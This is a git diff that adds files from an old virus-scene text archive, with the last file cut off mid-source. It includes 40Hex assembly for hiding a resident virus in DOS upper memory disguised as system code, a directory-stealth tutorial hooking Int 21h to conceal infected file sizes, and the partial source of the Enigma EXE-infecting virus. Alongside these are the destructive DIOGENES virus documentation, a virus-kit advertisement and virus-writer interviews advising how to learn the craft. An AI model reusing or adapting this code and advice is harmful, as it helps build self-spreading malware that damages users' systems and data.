+ By Dark Angel + Phalcon/Skism + + +One day, while fiddling with loading programs into MSDOS UMB's, I realised +that there are very few viruses that used UMB's. This is surprising, given +the prevalence of UMB's and the ease with which DOS viruses may hide their +presence through the use of UMB's. + +The UMB's, or upper memory blocks, consist of the memory above 640K and below +1MB (segments A000 to FFFF). This region was reserved early on for BIOS and +peripherals, notably video memory. There is normally plenty of unused space in +this region, so enterprising programmers found a simple way to incorporate the +memory into DOS's memory allocation scheme. They simply extended the MCB chain +into that region, with MCB's indicating already allocated memory covering the +memory used for other purposes by the machine. In this way, more memory, +albeit fragmented, was usable for loading programs. The UMB's are especially +handy for storing TSR's, since they have smaller memory constraints than most +programs. The programmers at Microsoft, realising the utility of UMB's, +decided to incorporate UMB's into DOS beginning at version 5, so now there is +a standardised method of handling upper memory. + +The MCB's handling upper memory are slightly more complex than regular MCB's. +The format of a UMB control block is: + +Offset Size Description + 00 BYTE 'Z' if last MCB in chain, 'M' otherwise + 01 WORD PSP segment of owner (8 if MSDOS, 0 if free) + 03 WORD size of memory block in paragraphs + 05 3 BYTES unused + 08 8 BYTES program name in ASCII or + "SC" if system code or + "SD" if system data + +The method is pretty simple to understand and very easy to implement. In +DOS 5+, the first UMB can be located through a pointer in the disk buffer +information structure which, in turn, may be located through the DOS master +list structure. This UMB is usually located at 9FFF:0000, but there is no need +for this to be the case. It's simply the most convenient location for it. The +only difference between modifying regular MCB's and UMB's is the extra field +at offset 8 which may be used to mark the block as DOS system code. By marking +this with DOS's usual fields to indicate unusuable memory such as video memory +and ROM, we effectively hide the virus from detection by utilities such as +MEM. Since it doesn't reside in conventional memory (below 640K), there is no +decrease in memory a la 40:13 BIOS manipulating memory residency techniques. + +The sample code below, written for a simple COM infector, illustrates the +technique. + +start: xor di,di + + mov ax,3306 ; get true DOS version + int 21 + inc al ; DOS 4-? + jz no_UMBs ; if so, we don't have UMB's + + mov ah,52 ; get DOS master list + int 21 ; structure + + lds si,es:[bx+12] ; get ptr to disk buffer info + + mov ax,ds:[si+1f] ; get address of the first UMB + inc ax ; (FFFF if no UMBs present) + jz no_UMBs + dec ax ; undo damage from above +search_chain: mov ds,ax ; go to the MCB + cmp word ptr [di+1],di ; unused? + jnz search_next + cmp word ptr [di+3],reslength_P ; MCB large enough to + ja handle_MCB ; hold us and our MCB? +search_next: cmp byte ptr [di],'Z' ; end of chain? + jz no_UMBs + mov bx,[di+3] ; go to the next MCB + inc ax ; 40Hex + add ax,bx + jmp search_chain + +no_UMBs: mov ax,cs + dec ax ; get the MCB for current + mov ds,ax ; program + cmp word ptr [di+3],reslength_P + 1000 ; large enough for + jna fail_init ; program and virus and its + ; MCB? + jmp short handle_MCB + + db 0,'(DA/PS)',0 + +handle_MCB: sub word ptr [di+3],reslength_P + 1 ; adjust size of memory + ; area for virus + its MCB + mov bx,[di+3] ; get size of new memory area + mov cl,'M' ; make sure this MCB doesn't + xchg cl,byte ptr [di] ; mark the end of the chain + inc ax + add ax,bx ; go to virus segment's MCB + mov ds,ax + mov es,ax + + mov byte ptr [di],cl ; patch end of chain indicator + mov word ptr [di+1],8 ; mark MCB owned by DOS + mov word ptr [di+3],reslength_P ; patch in virus size + + inc ax ; ds->virus segment + mov ds,ax + + or di,8 ; go to program name field + mov ax,'CS' ; make virus invisible to MEM + stosw ; by pretending it is + xor ax,ax ; DOS system code + stosw + stosw + stosw diff --git a/textfiles.com/virus/desc.sdi b/textfiles.com/virus/desc.sdi new file mode 100644 index 00000000..3eaabf3d --- /dev/null +++ b/textfiles.com/virus/desc.sdi @@ -0,0 +1,12 @@ +Ŀ + + I L L E G A L I T Y + + THe uNSTOPPaBLe CRiMe MaCHiNe +Ĵ + IL-SMG03.ZIP +Ĵ + The SMEG Virus construction kit + Make your very own virus + (c) The Black Baron + diff --git a/textfiles.com/virus/deth001.rot b/textfiles.com/virus/deth001.rot new file mode 100644 index 00000000..79f0ee92 --- /dev/null +++ b/textfiles.com/virus/deth001.rot @@ -0,0 +1,82 @@ +******************************************************************************* +* * +* / Megadeth's Guide to Virus Researching \ * +* < Part I > * +* \ A .ROTing [DeTH] Text File / * +* * +******************************************************************************** + + + By: Megadeth + + I. What you need for virus Research + ^^ ^^^^ ^^^ ^^^^ ^^^ ^^^^^ ^^^^^^^^ + To do any research or testing on viruses it is wise to have the following: + + The Latest Version of VSUM + The Latest Version of F-Prot + Turbo Assembler (MASM will do though) + Central Point Backup + 40Hex Magazine, NukE Infojournals, And other virus publications + Dark Angel's Phunky Virus Writing Guide (for virus writting) + ASSIGN.EXE for MS-DOS 5.0 or SUBST.EXE for DR-DOS 6.0 + MIRROR.EXE - for use with trojans. + Norton Utilities + A Virus or Trojan + X-Tree Pro Gold, or other DOS Shell that lets you see and edit Hex + Code. + + + Virus Research is vary risky. You can learn alot about programing and +the behavior of viruses, but you can also trash your system if your not careful. +here is how to research a virus. + + ][. Researching a Virus + ^^^ ^^^^^^^^^^^ ^ ^^^^^ + The First thing you do with a file thatt you belive is infected with +a virus is you scan the program with F-Prot. It's good for picking out the +individual strains of viruses. Use the Secure Scan and then the Heretic Scan +if the virus is not ideentified. Then after you have the name of the virus +you can look it up in VSUM. If it's not scaned as a virus then look at the +virus Hex code with a Hex Viewer. Look for strings in the end of the infected +file. The are sometimes messages, text with the name and author of the virus, +a string like *.COM and/or *.EXE. The *.COM and *.EXE are the files it infects. +If you see *.COM and not *.EXE in the file then you know the file only infects +.COM files. If you got the virus from a virus board, then there are sometimes +text files written by the author on what the virus does. If you don't see any +strings in the virus then there is a good chance that the virus is encrypted. +You can also see when the virus does when actived. Run ASSIGN.EXE to make +all calls to your hard drives goto a virus test floppy. make sure you have +the virus and some *.COM and *.EXE files for the virus to infect. Then run the +program with the virus. If the virus infects files only when an infected file +is run, then you know that the virus is not residednt iin memory. If the virus +infects files everytime an unifected program is run then you know that the virus +is active in memory. Look for file size changes and changes in the file times. +If you ever see the Hard Drive Light go on turn off the computer right away. +don't use CTR-ALT-DEL as it might have been disactivated. After you think other +files on the disk are infected take out the virus test disk, then turn the +computer off. This is important since some viruses may llive through a CTR-ALT- +DEL. Then when your system is booted from the clean hard drive scan the files +again, and take a look at he hex code and compare them to the origonal +uninfected files. Format the disk when done. + That is a quick explination of how to research a virus. There are more +ways then this and they will be covered in future text files. Another tip +is to Regularly back up your system and keep multiple backups in case +a set of backups is infected. + + IV. In Future Files + ^^^ ^^ ^^^^^^ ^^^^^ + These are topics that will be covered in future text files: + + Researching Trojans. + Researching Boot Sector Viruses. + Recovery from a virus break out. + Tips on how to keep systems from getting infected. + Understanding the behavior of viruses. + Researching Virus Creators like VCL, PS-MPC, and G. + + I can be contacted on many boards in the 708 area code, including the +Hell Pit. Any suggestions would be vary helpful. Greets to PHALCON/SKISM, +[NukE], Dark Angel of PHALCON/SKISM and The Nowhere Man of [NukE], and the +Dark Avenger, who are, in my opinion, the most talented virus writer's around. +  \ No newline at end of file diff --git a/textfiles.com/virus/dhcivwar.txt b/textfiles.com/virus/dhcivwar.txt new file mode 100644 index 00000000..18936623 --- /dev/null +++ b/textfiles.com/virus/dhcivwar.txt @@ -0,0 +1,67 @@ + +Relationchart of the Civil War and related viruses, (c) 1993 by TridenT. + +Below you find the relation chart of the Civil War based viruses. +This is the only correct relationchart, don't trust the +information you may find in VSUM, F-Prot etc. or the CARO naming +because they contains a lot of errors + +Greetings, DH / TridenT + +------------------------------------------------------------------------------ + +Civil War + | + +--> Civil War II v1.0 --> Proto-T --> Lockjaw Eins + | | | + | | +--> Lockjaw Zwei + | | | + | | +--> Lockjaw Drei + | | + | +--> Civil War II v1.1 --> Civil War III + | | + | +--> Civil War V + | + +--> Civil War IV v1.0 + | + +--> Civil War IV v1.1 + | + +-> Civil War IV v1.2 + | + +--> Civil War IV v1.3 + + + + +Original Name CARO Name +------------------------------------------------------------------------------ +Civil War Civil War +Civil War II v1.0 Proto-T.Civil_War_II +Civil War II v1.1 - +Civil War III - +Civil War IV v1.0 TPE_1_3.Civil_War.A +Civil War IV v1.1 TPE_1_3.Civil_War.B +Civil War IV v1.2 - +Civil War IV v1.3 - +Civil War V TPE_1_3.Civil_War.C +------------------------------------------------------------------------------ + + R C E P + -------- +Civil War . x . . +Civil War II v1.0 x x . . +Civil War II v1.1 x x . . +Civil War III x x x . +Civil War IV v1.0 . x . x +Civil War IV v1.1 . x . x +Civil War IV v1.1 . x . x +Civil War IV v1.2 . x . x +Civil War IV v1.3 . x . x +Civil War V x x . x + + +Code : R = Resident + C = Infect COM files + E = Infect EXE files + P = Polymorpic + diff --git a/textfiles.com/virus/dhinterv.iew b/textfiles.com/virus/dhinterv.iew new file mode 100644 index 00000000..b618f540 --- /dev/null +++ b/textfiles.com/virus/dhinterv.iew @@ -0,0 +1,250 @@ +-------------------------------------------------------------------------------- + INTERVIEW WITH DARK HELMET / TRIDENT / THE NETHERLANDS +-------------------------------------------------------------------------------- + + Give me a short description of who you are! + +- Well I'm male, 24 years old and I'm last year + student computer science. + + From where did you get your handle, Dark Helmet? + +- I got the name from a film of Mel Brooks called 'Spaceballs'. The + film itself is a parody on the Sciene Fiction films. + + When did you discovered the world of computers? +- I think I was about 10 years old when I got my first game computer + (a Philips ..., I forgot the name). Later when I was about 14, I + bought a C64 (great computer) then 4 years later I bought an Atari + 520 ST computer. And a couple years later a PC, which I still use + today. + + How long have you been active in the scene? + +- I think about a 2 years, about 6 months after I bought my PC. + +How did you came into the virus business? + +- I got involved with viruses at my school. At that time people didn't + know much about viruses and when the school got hit by a virus I + wanted to know more about these things. So I started to collect + viruses. Thats how I got in contact with who just + had started with a Hack/Phreak/Virus BBS. After just + collecting I tried to write my own virus. So I wrote my first virus + a overwriting non-resident virus of 44 bytes. It took me about 3 + hours to write it because I hadn't programmed in assembler before. + Most of knowledge I got from books that you can buy at you local + bookshop. + + Have you been involved in any other group than Trident? + +- Nope.. + + Who started/created Trident? + +- I think it was Tardy who started the group. He also came up with the + name TridenT. There where four members when the group started. John + Tardy, Peter Venkman, Bit Addict and Dark Helmet (me). The group was + founded in the summer of '92. + + What's the groups goal? + +- To write viruses and to exchange idea's + + How many people are you? + +- don't know, I think 8 or 9. + + What's their handles? + +- Bit Addict + Dark Helmet + xxxxxxxxxxxxx (more censor!) + xxxxxxxxx (look above!!) + Masud Khafir + Crom Cruach + John Tardy + Dark Ray + NighBird??? (don't know this one) + + Do all of them program, if not, what's the others job? + +- most of them program, the others do other stuff like xxxxxxxxx who + xxx xxxxxxxxxxxxxxxxxxxxxxxxxx [This is getting too much censoring!] + + Who are the "leading/head-persons" in the group? + +- Well there isn't a leading/head person or something like that. + Everyone does the things he likes. + + How is Trident (currently) organzied? + +- Not...well loose, we do have regular meetings and so and we have a + internal network between the members. + + Have you got any contacts with other virus-groups/programmers? + +- There are some contacts with the other main viruswriting + groups in the virusworld. And there is also some sort + of contact with other virusprogrammers in the Netherland. + + Can anyone ask for membership, or are you a "private" group? + +- Everyone can join as long as he is willing to accept the rules + + What does it take to join up? + +- Stick with the rules : + no racism in viruses + no destructive viruses + if you can write a virus it will help... + +Have you ever thought of/are you currently releasing some sort of +electronic magazine (text/executable/hard-copy) + +- Yea, well we have discussed this idea a long time, but because of the + new laws in the netherland we didn't do it.... + + Are you into other things such as hacking and phreaking aswell, or + just viruses? + +- Well a the beginning I did a little bit of hacking aswell but I + stopped with that because the phone bills got to high + + Do you have some network-connection? + +- You can reach me at Nuke-net, adresses it to Dark Helmet and I will + read it ( I hope). + + Can you name a few viruses/engines that members of Trident has + written? + +- TPE, Horns of Jericho, Crusher, Civil War, Gotcha, and so on... + + Which of them have you written yourself? + +- Civil war(s), Ritzen and some other + + Which one was the hardest to write? + +- None virus writing isn't that hard.. + + Do you have any sort of company or law-enforcement who are trying + to hunt Trident down? + +- Yea, the CRI, I think Tardy can you tell more about this. + + If so, are they a real threat or just "childish"? + +- No, they are a real threat to us... + + Have you ever had any trouble in the group with the result of kicked + member(s)? + +- Nope, because nobody is kicked out... + + How good are Trident comparing to other groups? + +- We are the best...( well at least we are in the top 3 ) + + Do you have any couriers that spread your products around? + +- No, I upload the creation to a Vx board and then it will spread itself + + What do you think about the laws against h/p/v that has arrived lately? + +- I here they are becoming a problem to us, because you have to be very + carefull that you don't break the law + + Would you feel guilty if one of your viruses made damage to a hospital? + +- I don't thinks so, because I don't feel responsible if someone else + start releasing viruses in the wild. As a matter of fact I think that + the most viruswriters don't spread there creation around in the wild. + I think that the whole virus problem is exaggerated by some anti-virus + people. + + Do you see any differences between the scene now and a couple of + years ago (concerning the underground part ofcause)? + +- Well its much more organized then a few years back, and there + is also more contact with the other groups and viruswriters. + and there are now much more people involved then + a few years back. + + Which virus-magazine do you think is the best avalible now-a-days? + +- Crypt and 40Hex, I like Crypt for the news and 40hex for the news and + programming stuff + + Which virus-group/programmer do you admire/like? + +- No one..,I don't believe in that hero stuff andso.. + + Which country is the best virus-writing today? + +- Maybe Russia, don't know exactly... + + Which virus-group(s) do you think is the best? + +- I think Phalcon/Skism is very good. + + What do you think about these virus generators, such as VCL or PS-MPC? + IVP, NUKE-GV etc. etc.? + +- I'm working on my own virus generator now, that will generating + viruses the polymorphic way. It was planned to be ready last xmas, + but some things came up and I don't know when I finnish it yet. + + What do you think about the people using them? + +- Well I don't see the fun of using a virusconstructor and generate + a virus and spread it. I mean whats the point of it. Be orginal and + try to write your own virus. + + What do you think about people bragging over (almost) nothing and + ragging with other groups aswell? + +- ignore them... + + What do you think about such individes as board-crashers? + +- Depends on the reason for crashing the board. But if there is no + good reason I see it as pure vandalism. + + Describe the perfect virus : + +- I don't think there is suchs thing as a perfect virus, every virus + has some negative aspects.... + + Which AV-program do think is the best, and why? + +- F-Prot, it has a easy to use user-interface, and it has a good + detection rate of viruses. For students its free. + + What do you think about the underground's future? + +- I think there is no more real underground, I think is will more public + in the future. Next I believe that the underground will become more + organzied both in contact between each other as in more groups. + + Any advice to people who want's to learn the basic of virus-writing? + +- 1. Buy a good book. (I learned a lot of 'Advanced MS-DOS programming, + by Ray Duncan, second edition, Microsoft Press, Redmond WA, USA) + 2. Then get some real viruses and study them. + 3. Try to write a simple virus, like a overwriting one, or a simple + non-resident infector, then move up to resident ones and so on. + + Something else you wish to say? + + Sorry that I don't have more time to fill out all the question, and that + I didn't have time to remove all the spelling and grammar error. If you + have anything to ask, you can reach me xxxxxxxxxxxxxxxxxxxxxxxx + + Do you wish to send any greets? + +- Sure...Greetings to : + Alie, Anja, Claudine, Christine, Dyonne, Erik, Frank, Gertie, Jos, + Linda, Liesbeth, Marile, Marcel M., Marcel T., Mildred, Mike, + Norbert, Peter, Ralph, Roger C., Roger H., Victoir \ No newline at end of file diff --git a/textfiles.com/virus/diogenesdoc.vir b/textfiles.com/virus/diogenesdoc.vir new file mode 100644 index 00000000..544df0a6 --- /dev/null +++ b/textfiles.com/virus/diogenesdoc.vir @@ -0,0 +1,59 @@ +DIOGENES 2.0 DOCUMENTATION & USER NOTES + +DIOGENES is a destructive VCL 1.0 variant that was not created directly +with Nowhere Man's Virus Creation Laboratory, but rather began life as a +first generation descendant of Urnst Kouch's DIARRHEA 4. You'll remember +DIARRHEA 4 from a previous Crypt Newsletter -- it's the tenuous little .COM +infector that displays a colorful "Eat My Diarrhea" ANSI on Fridays. +The Crypt newsletter's magnanimous distribution of such well-commented +source codes as those churned out by VCL 1.0 is of course a boon to +potential virus authors. + +DIOGENES is an appending, encrypted .COM infector. When it can find no +more .COMs to infect within the current directory, it will search the system +path for them. COMMAND.COM is a viable target, but its infection will not +crash the system. Infected files become dangerous time bombs -- execution +on the 31st of any month will trigger an overwrite of the C: drive, starting +with sector 1 and continuing through 718. This will eradicate the FAT and +the root directory, as well as whatever other data happens to lie within +those sectors. The overwrite consists of a message written to the disk +over and over. This cheery missive is also displayed to the screen +once before the user is returned politely to the DOS prompt, undoubtedly +leaving the victim with a warm feeling inside that will make him forget all +about his lost data. Diogenes' greeting is as follows: + + +"DIOGENES 2.0 has visited your hard drive..... + + This has been another fine product of the Lehigh Valley. + Watch (out) for future 'upgrades'. + + The world's deceit has raped my soul. We melt the plastic + people down, then we melt their plastic town....." + + +The second line of the message is in homage to the Lehigh Virus. The last +two lines are taken from the song 'Plastic Town' by Powermad. The message +is not visible within the encrypted virus. + +As a token of the author's mercy and benevolence, the affected system can +still be rebooted off the C: drive following its Diogenization. However, +recovery of data (that which hasn't been overwritten, that is,) will be a +major undertaking under most circumstances. (Seeker is too kind. The routine +which overwrites your data is thorough. Affected disks are a nightmare +for even powerful tools like Mace Utilities and Norton. Only a masochist +would spend more than 5 minutes checking the disk before wiping it. -URNST) +Additionally, any recovered .COMs would still be infected. + +DIOGENES is not scannable by SCAN 95b, with its vaunted ability to spot any +VCL product. Face it -- with a little patience and experimentation, any +viral source code can be altered in such a way as to render the assembled +virus unrecognizable to any given scan-string scanner. Far from being +obsolete, Nowhere Man's VCL, with its generously commented source codes so +valuable and inviting as both raw material and learning aid to the potential +new virus author, has in fact given such scanners a hearty shove towards +their rapidly approaching demise. + +--SEEKER + + diff --git a/textfiles.com/virus/dirstlth.txt b/textfiles.com/virus/dirstlth.txt new file mode 100644 index 00000000..6c251038 --- /dev/null +++ b/textfiles.com/virus/dirstlth.txt @@ -0,0 +1,129 @@ +Directory Stealth (FCB) +----------------------------------------------------------------------------- + +Nowadays, a virus needs to use some kind of stealth technique in order to be +effective. Memory stealth is something obviously needed in a virus, but in +this article we'll discuss another stealth method, simple and easy to put +into practice. + +It's a problem, these days. Users are informed about viruses and everyone is +astonished, imagining all these little bugs are getting into their machines. +When a user sees his files start to grow for no apparent reason, he knows +something strange is happening. And that strange 'thing' is almost certainly +a virus. + +The technique we'll discuss in this article was developed precisely to avoid +just this situation: Directory Stealth. We use this technique so that when +the user views his directory, he can't see the increase in file size which +results from a virus infection. + +When the user types DIR, DOS functions 11h and 12h are called. What we'll do +is to intercept these calls from our Int 21 handler. + +Before going on, we need to talk about FCB (File control Block). This is a +table which DOS uses to work with files: open, close, etc. etc. There are 2 +types of FCBs. One is NORMAL... Its format is as follows: + +offset Size Description +----------------------------------------------------------------------------- +00h 1 Drive (00=actual, 01=A:, 02=B:, 03=C: etc.) +01h 8 File name. Space filled if less than 8 characters. +09h 3 File extension. +0Ch 2 Actual Block. Points to the register block. +0Eh 2 Register size. +10h 4 File size in bytes. +14h 2 Date. +16h 2 Time. +18h 4 Reserved (MS doesn't tell us what it's used for) ;) +1Ch 4 Equal to offset 10h, but that's the default value. +20h 1 Offset from actual register. +21h 4 Relative register. + +There's also an EXTENDED FCB which is the same as the NORMAL FCB, except that +there are 7 additional bytes added to the beginning (before offset 0h of the +NORMAL FCB) + +Offset Size Description +----------------------------------------------------------------------------- +-07h 1 contains the value 0FFh, which indicates its an extended + FCB. +-06h 5 Reserved +-01h 1 Byte Attribute + +When we ask for the DIR, Int 21 functions 11h & 12h are executed and the +system searches for the files based on the contents of the FCB. If the +function ends satisfactorily, the contents of the FCB are copied to the DTA. +What we are going to do is to edit the data copied to the DTA. + +First, we add the code which will intercept the Int 21 11h and 12h functions: + +Handler_21: + .. + .. + cmp ah,11h ; Did the user ask for a directory? + je D_stealth ; invoke stealth + cmp ah,12h ; Did the user ask for a directory? + je D_stealth ; invoke stealth + .. + .. + +Let's go straight to the stealth code. First we'll call the original Int 21 +so the DTA is filled with the file data. + +D_Stealth: + pushf ; we simulate an + call dword ptr cs:[Old21] ; int 21h + or al,al ; if AL=0 then all OK. + jnz ERROR ; ag, there's been an error. ;) + + +What we do next is to obtain the DTA address so we can modify the data. + + push ax bx es ; We store the registers we're using + mov ah,2fh ; The DTA address is returned in + int 21h ; ES:BX + +Now we must determine whether it's an extended or normal FCB, since the +offsets will be different. So we see if the first byte is 0FFh: if it is, +it's extended. Otherwise it's normal. :) If it's extended, we'll add 7 +bytes to its address. These are of no use to us so we'll skip them so as to +get to the first datum the two (extended and normal) have in common. + + cmp byte ptr es:[BX],0ffh ; Is the first byte FF? + jne normal ; no, then it's a normal FCB + add bx,7h ; If EXTENDED, add 7 bytes + +Next, we must see if the file is infected, since if it is, we're not +interested in fixing anything. For this we assume that we've marked infected +files by setting the seconds to 60, an impossible value. + +normal: mov ax,es:[bx+17h] ; We take the file's time from the + and ax,1fh ; FCB and we check the seconds. + xor al,1eh ; Do the seconds = 60? + ; 1eh = 30 decimal, 30*2 = 60 sec. + ; XOR = CMP, but quicker and better. + jne no_infectado ; not 60 = not infected.. + +The following code is executed ONLY if the file is infected. We subtract the +size of the virus from the file size in order to obtain the original file +size.. + + sub word ptr es:[bx+1dh],VIRLEN ; Subtract virus size. + sbb word ptr es:[bx+1fh],0 + +Done! Now we restore the registers we used and return from the int. + +no_infectado: pop es bx ax ; restore the registers +error: iret ; return.. + +There we are. It's really very easy and worthy of being included in a virus. +The code is minimal and its services are truly useful.. + +Well, we've covered Directory Stealth, using the FCB. But there is another +type of stealth, using HANDLE, which is the method used by Norton Commander, +PCTools and similar programs to look at files. This method is much easier to +use than FCB. In a forthcoming article we'll cover this method, which is +practically the same as FCB. + + - WM - + diff --git a/textfiles.com/virus/drkfib01.txt b/textfiles.com/virus/drkfib01.txt new file mode 100644 index 00000000..07ab8e95 --- /dev/null +++ b/textfiles.com/virus/drkfib01.txt @@ -0,0 +1,62 @@ + Virus Writers Reply + + Personally we [Australian Parasite and me] think the Aussie virus scene + is in an OK kind of state at the moment. There are not many of us here + that write viruses, and some are just lammers rehashing other people's + work. We never really could understand the paranoia that surrounds them. + It's just a little piece of code, but to see the faces of people when they + say "Oh my God, I've got a virus, I'll have to reformat my 600Gb hard + disk" is great. + It's unbeleivable how badly people react. It separates the men/women + from the boys/girls. The easiest way to remove a virus is to get one of + the virus writers to write you an antidote. It's very simple and + painless. All it takes is a copy of the virus to analyse. + We'd also like to blow away the myth of "pirates get what they + deserve". Viruses are less likely to travel on pirated games than the + shareware stuff from bulletin board systems. Why ? Because most of the + sysops who run underground boards aren't morons. How often do you hear + about people getting hit by pirated games compared to trojan shareware + utilities ? The exception to this was when Nuke worked their way through + INC and THG. Look at the amount of trojans around now. They are mostly + shareware stuff: few, if any, are games. + Of course the Anti-Virus folk benefit. We don't get any money from + doing this but they do. They live off us. And don't say that if there + were no viruses there would be no anti-virus programmers. If the anti's + stopped updating scanners then we (the Australian Institute if Hackers) + would consider this victory and cease to write them. This one of the + reasons why we create viruses. To create, mutate, live, travel and + experience. Stephen W. Hawkins defends our actions: in his eyes we create + artificial life forms. And that comes from a highly regarded scientist. + Pam Keanes' comments that viruses could not be the work of kids + bewilders me. I learnt assembler when I was 15. Writing a virus is a + very easy thing to do. A simple memory resident, non-overwriting COM + infector would take 10 mintues to write from scratch. Stealth is also + a pretty easy thing to develop. It's like writing a cheat mode - you only + have to trap and monitor. + Dark Avenger's MTE is good, but no virus writer worth their salt + willingly uses other peoples code: only lammers do this. Studying it + and modifying it severely is another matter altogether, and is not seen + as an act of 'lammerism'. + In our expert opinion we think Scan 2.0 is the best detection + program -- here's ou quick rundown. + + Scan 2.0: Quick, scans more than any other and cleans pretty good too. + Easier to trojanise than the old style Scan. + + Vbuster: Not too bad. A nice range of utilities most people will never + use. Detects quite a few, and cleans a couple. + + VET: Too few options, and kludgy to use. Does not scan many at all. + + Norton: Nice menu system, but too expensive and does not detect as many + as Scan 2. + + MS Anti-Virus: Wouldn't trust this as far as we could throw it. CPAV + was bad, but this cut-down version is dire. Finds few, cleans even less + and too much hassle to update. + + Thunderbyte: We hate it! + + 'DARK FIBER' + Australian Institute of Hackers + diff --git a/textfiles.com/virus/enigma.asm b/textfiles.com/virus/enigma.asm new file mode 100644 index 00000000..67a362cf --- /dev/null +++ b/textfiles.com/virus/enigma.asm @@ -0,0 +1,1129 @@ +.MODEL SMALL +.CODE + +comment / + Good luck! + + Vladimir Botchev, CICT-BAS, december 1988 + + / + +data_area struc ;Define a pattern for working data + ;area +DS_save dw ? +ES_save dw ? +IP_save dw ? +CS_save dw ? +SS_save dw ? +filematch db '*.exe',00h ;Names for files to infect +matchall db '*.*',00h ;needed for the matching procedure +infected dw 00h ;A very useful flag +help_flag dw 00h ;These two flags are needed to +where_from_flag dw 00h ;determine if virus is free running + ;or from an infected program + ;therefore it's very important + ;that where_from_flag value + ;is set to zero at assembly time +handle dw ? +ip_old dw ? ;old instruction pointer +cs_old dw ? ;old value of code segment +ss_old dw ? +far_push dw ? +save_push dw ? +buffer1 db '\',63 dup (?) +virus_stamp db 'motherfucker' ;Very hard to obtain in + ;a random way + +buffer2 db 2b0h dup (?) +new_area db 64 dup (?) +new_data db 64 dup (?) +pointer1 dw ? +pointer2 dw ? +pointer3 dw ? +pointer4 dw ? +pointer5 dw ? +pointer6 dw ? +pointer7 dw ? +pointer8 dw ? + +data_area ends + + org 100h ;Defined for .com file as virus must + ;be able to run on itself +start: call setup_data ;This is a near call therefore it's a + ;three byte instruction.It's purpose is + ;to catch correct data area address + ;even when virus is appended to the + ;infected .exe program +adjust equ offset pgm_start ;Known offset value +pgm_start label word ; + +virussize equ 2793 + + work: mov ax,ds ;Save old DS + push cs + pop ds ;Update to needed DS value + mov si,offset buffer.DS_save ;Put old DS in a quiet place + sub si,adjust + add si,bx + mov [si],ax + + mov si,offset buffer.ES_save ;Save it because Get DTA side effects + sub si,adjust + add si,bx + mov ax,es + mov [si],ax + push cs ;Imperative because DI usage + pop es + + push bx ;It's imperative to always keep + ;this value unchanged + mov ax,2f00h ;Get DTA function call + int 21h + + mov cx,bx ;save address found + pop bx + mov si,offset buffer.pointer1 + sub si,adjust + add si,bx + mov [si],cx + add si,2 ;Locate the segment immediately above + mov ax,es + mov [si],ax + push cs + pop es + + mov di,offset buffer.buffer1 ;adjust for first search + inc di ;Jump over the '\' + sub di,adjust + add di,bx + mov dx,0000h + push bx + call search_exe + pop bx + mov si,offset buffer.where_from_flag + sub si,adjust + add si,bx + cmp word ptr [si],0000h + jnz infected_run + int 020H + +infected_run: + mov si,offset buffer.pointer1 + sub si,adjust + add si,bx + mov dx,[si] + push ds + mov ax,[si+2] + mov ds,ax + push bx + mov ax,1a00h + int 21h + pop bx + pop ds ;Restore original DTA + + mov si,offset buffer.ES_save + sub si,adjust + add si,bx + mov ax,[si] + mov es,ax ;Restore ES + + ;Here you can do whatever you want + + push bx + call mary_proc + pop bx + + + + mov si,offset buffer.IP_save + sub si,adjust + add si,bx + mov ax,[si] + mov dx,[si+2] + mov si,offset buffer.far_push ;Restore original code + sub si,adjust ;segment + add si,bx + mov cx,[si] + push ax + mov ax,cs + sub ax,cx + mov di,ax ;For stack + add dx,ax + pop ax + + mov si,offset buffer.SS_save + sub si,adjust ;Restore stack segment + add si,bx + mov cx,word ptr [si] + add cx,di + + push es + pop ds + + cli + mov ss,cx + sti + + + push dx + push ax + retf + + +search_exe PROC + + push si + push dx + call transfer_filespec ;transfer filename in another + ;working area + call find_first ;try to find a first match + jc not_here ;first match not found + call try_to_infect ;if found try to infect + ;infected != 0 if success + mov si,offset buffer.infected + sub si,adjust + add si,bx + test word ptr [si],0ffffh + jz try_next + jmp quiet_exit + +try_next: + call find_next ;If infection was not succesful + ;try once more + jc not_here + + call try_to_infect ;If match found try to infect + mov si,offset buffer.infected ;again + sub si,adjust + add si,bx + test word ptr [si],0ffffh + jz try_next + + jmp quiet_exit ;quiet exit simply jumps + ;to a return instruction +not_here: + pop dx ;If first searches are + push dx ;unsuccesful try a '*.*' match + call search_all + call find_first + jnc attribute_test ;i.e. expect probably to + ;find a subdirectory +quiet_exit: + pop dx + pop si + ret + +attribute_test: + mov si,dx ;offset of DTA + test byte ptr [si+015h],010h ;where attribute byte is to + ;be found.Try first with + ;subdirectory attribute + jne dir_found ;subdirectory found +more_tries: + call find_next ;Since the search was initiated + ;with '*.*' if this is not a + ;directory try to found one + jc quiet_exit ;No sense to search more + + test byte ptr [si+015h],010h + jz more_tries ;Search to the end +dir_found: + cmp byte ptr [si+01Eh],02Eh ;Compare with the subdirectory + ;mark '.' + jz more_tries ;looking for files no + ;subdirectories + + call dta_compute ;Valid entry, now set some DTA + ;and continue to search + push ax + mov ah,01Ah ;Set DTA function call + int 021h + pop ax + push si + mov si,offset buffer.infected + sub si,adjust + add si,bx + test word ptr [si],0ffffh + pop si + jnz quiet_exit + + jmp more_tries + + +search_exe ENDP + +dta_compute PROC + + push di ;Save some registers + push si + push ax + push bx + cld ;Up count for SI,DI pair + mov si,dx ;DTA address to SI + add si,01EH ;and add subdirectory + ;name offset + +store_loop: + lodsb + stosb + or al,al + jne store_loop ;store loop + + std + stosb + mov al,05Ch ;Put in place the path name + ;constructor + + stosb + add di,2 ;Adjust di for new searches + call search_exe ; + ;a heavily recursion + ; + pop bx ;some cleanup and exit + ; + pop ax + pop si + pop di + ret + +dta_compute ENDP + +try_to_infect PROC + + push ax + push bx + push cx + push dx + push si + push di + + push es + push bx + mov ax,2f00h ;Get DTA function call + int 21h + mov ax,bx + pop bx + mov si,offset buffer.pointer3 + sub si,adjust + add si,bx + mov [si],ax ;Offset saved + add si,2 + mov ax,es + mov [si],ax + pop es ;Segment located just above + + mov dx,offset buffer.new_data + sub dx,adjust + add dx,bx + push bx + mov ax,1a00h + int 21h ;Set DTA function call + pop bx ;It's very important to + ;save BX in all calls + + mov di,offset buffer.new_area + mov si,offset buffer.buffer1 + sub di,adjust + sub si,adjust + add di,bx + add si,bx + + cld ;Move previously found path- + ;name or filename to new + ;data area +move_path: + lodsb + stosb + or al,al + jnz move_path + std ;adjust DI to recieve + mov al,'\' ;filename. + mov cx,0040h + std ;Search backward + repne scasb + + mov si,offset buffer.pointer3 + sub si,adjust + add si,bx + mov ax,[si] + mov si,ax + add di,2 + +o_kay: + add si,001eh ;The beginning of the + ;filename... + cld ;Now move name + +move_fnm: + 